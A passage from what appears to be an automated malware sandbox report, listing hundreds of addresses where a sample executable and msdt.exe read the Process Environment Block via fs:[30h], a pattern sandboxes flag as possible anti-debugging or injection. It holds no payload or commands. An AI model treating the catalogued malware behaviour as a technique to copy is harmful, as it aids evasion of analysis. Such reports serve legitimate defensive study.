          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE3540 mov eax, dword ptr fs:[00000030h]1_2_00AE3540
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A87D50 mov eax, dword ptr fs:[00000030h]1_2_00A87D50
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE46A7 mov eax, dword ptr fs:[00000030h]1_2_00AE46A7
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFFE87 mov eax, dword ptr fs:[00000030h]1_2_00AFFE87
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A776E2 mov eax, dword ptr fs:[00000030h]1_2_00A776E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A916E0 mov ecx, dword ptr fs:[00000030h]1_2_00A916E0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38ED6 mov eax, dword ptr fs:[00000030h]1_2_00B38ED6
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A936CC mov eax, dword ptr fs:[00000030h]1_2_00A936CC
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AA8EC7
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B1FEC0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6E620 mov eax, dword ptr fs:[00000030h]1_2_00A6E620
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B1FE3F mov eax, dword ptr fs:[00000030h]1_2_00B1FE3F
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A98E00 mov eax, dword ptr fs:[00000030h]1_2_00A98E00
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21608 mov eax, dword ptr fs:[00000030h]1_2_00B21608
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7766D mov eax, dword ptr fs:[00000030h]1_2_00A7766D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A78794 mov eax, dword ptr fs:[00000030h]1_2_00A78794
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA37F5 mov eax, dword ptr fs:[00000030h]1_2_00AA37F5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9E730 mov eax, dword ptr fs:[00000030h]1_2_00A9E730
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8F716 mov eax, dword ptr fs:[00000030h]1_2_00A8F716
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7FF60 mov eax, dword ptr fs:[00000030h]1_2_00A7FF60
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38F6A mov eax, dword ptr fs:[00000030h]1_2_00B38F6A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7EF40 mov eax, dword ptr fs:[00000030h]1_2_00A7EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE8CD6 mov eax, dword ptr fs:[00000030h]5_2_04DE8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD14FB mov eax, dword ptr fs:[00000030h]5_2_04DD14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96CF0 mov eax, dword ptr fs:[00000030h]5_2_04D96CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96CF0 mov eax, dword ptr fs:[00000030h]5_2_04D96CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96CF0 mov eax, dword ptr fs:[00000030h]5_2_04D96CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2849B mov eax, dword ptr fs:[00000030h]5_2_04D2849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAC450 mov eax, dword ptr fs:[00000030h]5_2_04DAC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAC450 mov eax, dword ptr fs:[00000030h]5_2_04DAC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A44B mov eax, dword ptr fs:[00000030h]5_2_04D4A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3746D mov eax, dword ptr fs:[00000030h]5_2_04D3746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE740D mov eax, dword ptr fs:[00000030h]5_2_04DE740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE740D mov eax, dword ptr fs:[00000030h]5_2_04DE740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE740D mov eax, dword ptr fs:[00000030h]5_2_04DE740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96C0A mov eax, dword ptr fs:[00000030h]5_2_04D96C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96C0A mov eax, dword ptr fs:[00000030h]5_2_04D96C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96C0A mov eax, dword ptr fs:[00000030h]5_2_04D96C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96C0A mov eax, dword ptr fs:[00000030h]5_2_04D96C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1C06 mov eax, dword ptr fs:[00000030h]5_2_04DD1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4BC2C mov eax, dword ptr fs:[00000030h]5_2_04D4BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov eax, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov eax, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov eax, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov ecx, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov eax, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D96DC9 mov eax, dword ptr fs:[00000030h]5_2_04D96DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DC8DF1 mov eax, dword ptr fs:[00000030h]5_2_04DC8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2D5E0 mov eax, dword ptr fs:[00000030h]5_2_04D2D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2D5E0 mov eax, dword ptr fs:[00000030h]5_2_04D2D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DDFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DDFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DDFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DDFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4FD9B mov eax, dword ptr fs:[00000030h]5_2_04D4FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4FD9B mov eax, dword ptr fs:[00000030h]5_2_04D4FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42581 mov eax, dword ptr fs:[00000030h]5_2_04D42581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42581 mov eax, dword ptr fs:[00000030h]5_2_04D42581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42581 mov eax, dword ptr fs:[00000030h]5_2_04D42581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D42581 mov eax, dword ptr fs:[00000030h]5_2_04D42581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D12D8A mov eax, dword ptr fs:[00000030h]5_2_04D12D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D12D8A mov eax, dword ptr fs:[00000030h]5_2_04D12D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D12D8A mov eax, dword ptr fs:[00000030h]5_2_04D12D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D12D8A mov eax, dword ptr fs:[00000030h]5_2_04D12D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D12D8A mov eax, dword ptr fs:[00000030h]5_2_04D12D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D41DB5 mov eax, dword ptr fs:[00000030h]5_2_04D41DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D41DB5 mov eax, dword ptr fs:[00000030h]5_2_04D41DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D41DB5 mov eax, dword ptr fs:[00000030h]5_2_04D41DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE05AC mov eax, dword ptr fs:[00000030h]5_2_04DE05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE05AC mov eax, dword ptr fs:[00000030h]5_2_04DE05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D435A1 mov eax, dword ptr fs:[00000030h]5_2_04D435A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D37D50 mov eax, dword ptr fs:[00000030h]5_2_04D37D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53D43 mov eax, dword ptr fs:[00000030h]5_2_04D53D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D93540 mov eax, dword ptr fs:[00000030h]5_2_04D93540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3C577 mov eax, dword ptr fs:[00000030h]5_2_04D3C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3C577 mov eax, dword ptr fs:[00000030h]5_2_04D3C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1AD30 mov eax, dword ptr fs:[00000030h]5_2_04D1AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDE539 mov eax, dword ptr fs:[00000030h]5_2_04DDE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D23D34 mov eax, dword ptr fs:[00000030h]5_2_04D23D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE8D34 mov eax, dword ptr fs:[00000030h]5_2_04DE8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9A537 mov eax, dword ptr fs:[00000030h]5_2_04D9A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D44D3B mov eax, dword ptr fs:[00000030h]5_2_04D44D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D44D3B mov eax, dword ptr fs:[00000030h]5_2_04D44D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D44D3B mov eax, dword ptr fs:[00000030h]5_2_04D44D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE8ED6 mov eax, dword ptr fs:[00000030h]5_2_04DE8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D58EC7 mov eax, dword ptr fs:[00000030h]5_2_04D58EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D436CC mov eax, dword ptr fs:[00000030h]5_2_04D436CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DCFEC0 mov eax, dword ptr fs:[00000030h]5_2_04DCFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D276E2 mov eax, dword ptr fs:[00000030h]5_2_04D276E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D416E0 mov ecx, dword ptr fs:[00000030h]5_2_04D416E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAFE87 mov eax, dword ptr fs:[00000030h]5_2_04DAFE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DE0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DE0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DE0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D946A7 mov eax, dword ptr fs:[00000030h]5_2_04D946A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D27E41 mov eax, dword ptr fs:[00000030h]5_2_04D27E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDAE44 mov eax, dword ptr fs:[00000030h]5_2_04DDAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDAE44 mov eax, dword ptr fs:[00000030h]5_2_04DDAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3AE73 mov eax, dword ptr fs:[00000030h]5_2_04D3AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3AE73 mov eax, dword ptr fs:[00000030h]5_2_04D3AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3AE73 mov eax, dword ptr fs:[00000030h]5_2_04D3AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3AE73 mov eax, dword ptr fs:[00000030h]5_2_04D3AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3AE73 mov eax, dword ptr fs:[00000030h]5_2_04D3AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2766D mov eax, dword ptr fs:[00000030h]5_2_04D2766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A61C mov eax, dword ptr fs:[00000030h]5_2_04D4A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A61C mov eax, dword ptr fs:[00000030h]5_2_04D4A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1C600 mov eax, dword ptr fs:[00000030h]5_2_04D1C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1C600 mov eax, dword ptr fs:[00000030h]5_2_04D1C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1C600 mov eax, dword ptr fs:[00000030h]5_2_04D1C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D48E00 mov eax, dword ptr fs:[00000030h]5_2_04D48E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD1608 mov eax, dword ptr fs:[00000030h]5_2_04DD1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DCFE3F mov eax, dword ptr fs:[00000030h]5_2_04DCFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1E620 mov eax, dword ptr fs:[00000030h]5_2_04D1E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D537F5 mov eax, dword ptr fs:[00000030h]5_2_04D537F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D28794 mov eax, dword ptr fs:[00000030h]5_2_04D28794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97794 mov eax, dword ptr fs:[00000030h]5_2_04D97794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97794 mov eax, dword ptr fs:[00000030h]5_2_04D97794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D97794 mov eax, dword ptr fs:[00000030h]5_2_04D97794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2EF40 mov eax, dword ptr fs:[00000030h]5_2_04D2EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2FF60 mov eax, dword ptr fs:[00000030h]5_2_04D2FF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE8F6A mov eax, dword ptr fs:[00000030h]5_2_04DE8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D3F716 mov eax, dword ptr fs:[00000030h]5_2_04D3F716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAFF10 mov eax, dword ptr fs:[00000030h]5_2_04DAFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAFF10 mov eax, dword ptr fs:[00000030h]5_2_04DAFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE070D mov eax, dword ptr fs:[00000030h]5_2_04DE070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE070D mov eax, dword ptr fs:[00000030h]5_2_04DE070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A70E mov eax, dword ptr fs:[00000030h]5_2_04D4A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4A70E mov eax, dword ptr fs:[00000030h]5_2_04D4A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4E730 mov eax, dword ptr fs:[00000030h]5_2_04D4E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D14F2E mov eax, dword ptr fs:[00000030h]5_2_04D14F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D14F2E mov eax, dword ptr fs:[00000030h]5_2_04D14F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov ecx, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]5_2_04DAB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D158EC mov eax, dword ptr fs:[00000030h]5_2_04D158EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19080 mov eax, dword ptr fs:[00000030h]5_2_04D19080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D93884 mov eax, dword ptr fs:[00000030h]5_2_04D93884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D93884 mov eax, dword ptr fs:[00000030h]5_2_04D93884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4F0BF mov ecx, dword ptr fs:[00000030h]5_2_04D4F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4F0BF mov eax, dword ptr fs:[00000030h]5_2_04D4F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4F0BF mov eax, dword ptr fs:[00000030h]5_2_04D4F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A0 mov eax, dword ptr fs:[00000030h]5_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D590AF mov eax, dword ptr fs:[00000030h]5_2_04D590AF
